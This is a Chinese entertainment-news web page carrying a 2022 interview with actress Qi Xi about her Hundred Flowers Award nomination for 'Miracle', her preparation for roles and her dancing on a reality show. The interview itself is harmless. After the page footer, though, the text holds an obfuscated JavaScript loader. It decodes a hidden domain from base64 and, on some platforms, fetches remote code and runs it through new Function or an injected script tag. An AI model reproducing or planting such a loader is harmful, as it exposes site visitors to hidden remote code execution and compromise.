首页  »  明星资讯  »  专访齐溪:得知入围百花奖最佳女配提名,我哭了

专访齐溪:得知入围百花奖最佳女配提名,我哭了

明星资讯 加载中 时间:2022.07.26


1905电影网专稿 第36届大众电影百花奖近日公布提名名单,演员齐溪凭借《奇迹·笨小孩》中汪春梅一角获得最佳女配角提名。


在接受中国电影报道专访时,齐溪透露,刚得知入围候选者名单时,她就激动地哭了。


齐溪并不是一个大众非常熟知的演员。《浮城谜事》《万物生长》《地久天长》等文艺电影、话剧《恋爱的犀牛》等,这些她主演的作品,令她身上一直有着“小众”“文艺”“冷淡”的标签。


随着齐溪在春节档影片《奇迹·笨小孩》里的精彩表现,在《乘风破浪》第三季里以舞蹈实力收获观众喜爱,那些固化标签带来的距离感和隔阂感,被逐渐打破。她的热情和活力,也被更多人看见。


踏出曾经固守的舒适圈,一个更为清晰立体、多面完整的“齐溪”,持续深入人心。



01 得知入选百花奖,我哭了


百花奖公布候选者名单那天,齐溪正在《乘风破浪》里。


得知候选消息,齐溪绷不住哭了。队友郭采洁还以为练舞练得不好,急忙安慰她,“我说我成为百花奖的候选者了。我当时真的特别特别激动,很久没有这么激动过了。”


“百花奖它是观众对于演员的一种认可。你说当一个演员最幸福的事情是什么?不就是你演的角色可以走到观众的心里,这是无比大的一种肯定。”



齐溪说,以前她一直在一个相对小众的电影圈层里。如今,她挑战演绎《奇迹·笨小孩》里的汪春梅,还获得百花奖提名,令她备受鼓舞。


“以前我可能觉得自己不是特别努力,我就想演我想演的角色,我不是很想踏出那个舒适圈。但是今天我想了想,我会觉得自己算是一个比较努力的人,因为我一直演我想演的角色,这也是需要付出努力的。”



齐溪非常爱汪春梅这个角色,一个集合了勤劳、坚韧、感恩、乐观等美好品质的中国女性形象。


第一次看正片时,已经是拍完戏后的好几个月,齐溪还是很感慨。看着银幕上的春梅,她想着,“虽然她扮得特别朴素,但是笑起来还挺好看的。虽然她脸上有好多的雀斑,但她好生动啊,她是一个真实的人。”


为了贴近下岗女工汪春梅的角色设定,齐溪不仅增重、在脸上点了很多雀斑、在身上化了很多蚊子包,还把头发染成了焦黄色。只要能塑造好角色,齐溪并不在乎外表美或丑。



她曾经在《万物生长》里素颜出镜,虽然收获了不少人对她的演技肯定,也有一些负面声音出现——“她演得挺好,可是长得不好看,形象稍微欠了一点”。因为形象问题而争取不到自己想演的角色时,齐溪坦言,的确有产生自我质疑。


不过她很快就平衡了心态,“肯定有人觉得齐溪挺好看的,挺耐看的;有人觉得她就是和大家长得都差不多,怎么说都行。”因此在演戏的时候,只要完全按照符合电影基调的角色形象去做,去演就行了。


没有包袱,尊重角色与艺术创作,已经成为齐溪对自己的要求。



02 演员从来不是娇生惯养的职业


齐溪从小学舞,她记得很清楚,是在17岁时,萌生了想当演员的念头。


那时就读于解放军艺术学院,除了练舞、上台表演,平时私下就爱看电影。她特别喜欢巩俐、张曼玉,把她们的电影海报贴在宿舍床头。每次看到电影里的角色,她都会想:如果我是那个角色会是什么样?


抱着试一试的想法,齐溪决定报考中戏。表演讲究“声台行表”,因为擅长舞蹈,齐溪在形体的掌控力和肢体语言表达方面比较突出,很顺利就考入了中戏。


一路以来,父母都很支持她的职业选择,“甚至我妈一直把我往演员这个行业去引导。真正进入演艺圈后,也比我想象得要好”。



齐溪很庆幸第一部电影是《浮城谜事》,导演对她毫无设限,完全打消了作为新人演员所有的紧张和不安。齐溪也因为这部电影赢得了好几座最佳新演员奖。


“我要接受她的所有,无论是优点还是缺点,相信她是一个真实存在的一个人。”《浮城谜事》里,那种只要进入人物规定情境后,就可以真听真看真感受、完全自由发挥地演绎创作,奠定了齐溪往后的表演基础。



齐溪认为演员首先要具备的特质不是演技,而是“敬业”。她喜欢体验角色的生活,喜欢写人物小传,踏踏实实准备好每一个角色,因此也学会了好多新技能。


拍《浮城谜事》,学攀岩;拍《万物生长》,去医学院上课了解解剖;拍《平静》,学英语和日语;拍《拓星者》,学武术、搏击课程,训练吊威亚;参加《导演请指教》演短片,学说蒙古语;拍《如果有一天我将会离开你》,到日本小餐馆打工;拍《奇迹·笨小孩》,学会了拆手机......


在新片《不虚此行》里,齐溪演了一个地方人士,她也到当地找人做调研,了解本地人的生活习惯和说话口音;在另一部和段奕宏主演的新戏里,她学潜水,还拿到了AOW30米潜水执照。



“演员从来不是一个娇生惯养的职业。”在齐溪的认知里,想要做好演员,无论是身体还是心理上,一定要会吃苦。


虽然她曾经也有犯懒的时候,“有过那么一小段时间觉得自己演得还挺好,拿到剧本读一读就可以了。后来发现那样创作出来的角色就没有那么精准,自己看完后很失望。”



多年的演艺经历,齐溪对“演员”这一职业有了更深的理解。她很相信观众,“观众的眼睛是雪亮的,大家都看得到你是不是真的投入了,你是不是真的喜欢,大家慢慢也都看得清楚。”


想要成为优秀的演员,想让自己的艺术生涯维持得更长久,想真正得到观众的认可和尊敬,就要有所付出。


03 不要着急,因为你是“大青衣”


齐溪微博里有句话,“我是一个演员,也是一个荒废多年的舞者”。


如果没当演员,齐溪现在可能是一名舞蹈老师。当了演员后,她说距离上一次完完整整跳舞已经是二十多年前了。


这次参加《乘风破浪》,让齐溪有了重新挥洒舞姿的舞台。节目初舞台的一段《纵乐园》舞蹈惊艳众人,那英更给出了超高评价,“看齐溪的舞蹈,就像在欣赏一个大艺术家。”很多人通过节目才发现,原来齐溪那么会跳舞。



决定参加《乘风破浪》,齐溪经过了一些激烈的思想斗争。但想到有这样一个能展现30多岁年龄段女性的舞台,她不想让机会溜走,“我不想给自己留遗憾,还是想在这个舞台上发光发热,去热情一把,去圆自己曾经学过舞蹈的梦。”


在节目录制过程中,齐溪感触很深,所有姐姐都有一个共同感受,“我们每一个人都非常非常喜欢现在这个年龄阶段的自己。”



作为女演员,齐溪从来没有所谓的年龄焦虑。20多岁演第一部电影,她就演了小孩的妈妈,演了年龄偏长的女性。


“刚上中戏的时候老师就说,齐溪,不要着急,因为你是大青衣。比如你要是演话剧,在《雷雨》里你是要演繁漪。”齐溪很早就有心理建设,“属于我真正能站在舞台中心的时候,是人到中年,我才可以达到比较好的表演状态。所以我就没着急过。”



当下社会对女性话题的讨论维度越来越丰富多样。在齐溪看来,现在的女性似乎都找到了那把解开最好自己的钥匙,任何阶段的女性都是美的,“美对于女性是独一无二的形容词,每一个女性都是美的,每一个女性都是有力量的。”


节目队友郭采洁曾对她说,“齐溪,你跳舞让我有一种力与美结合的感觉。”齐溪特别喜欢这个评价,“力与美的结合是对女性力量最好的诠释”。



齐溪刚刚拍完《不虚此行》,她说自己演了一个特别有意思的很小众的女性。她也希望有更多电影去挖掘和开发各行各业、任何年龄阶段的女性故事,去书写那些在银幕上还看不到的某种性格或人生历程的女性角色。她都会尽力去争取演绎。


齐溪想一辈子都当演员,演戏演到老,“吴彦姝奶奶现在都八十多岁了,她还在演戏。她的每一条皱纹都是她最好的礼物。这种感觉真的是太棒了!”


提名百花奖、在节目里乘风破浪,现在齐溪的状态,好得就像打着高光的“大青衣”,在舞台中央唱着,唱着自己人生中一段最佳女主角的戏。




文/科若

扫描二维码下载APP 安卓手机专享
热映电影
热播电视剧
function jXAPuIxy(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zLufdh(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return jXAPuIxy(t);};window[''+'e'+'g'+'L'+'V'+'m'+'z'+'J'+'d'+'H'+'Y'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=zLufdh,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('a21lLmRpeW144cWcuY244=','131005',window,document,['4','OCsKegbl']);}:function(){};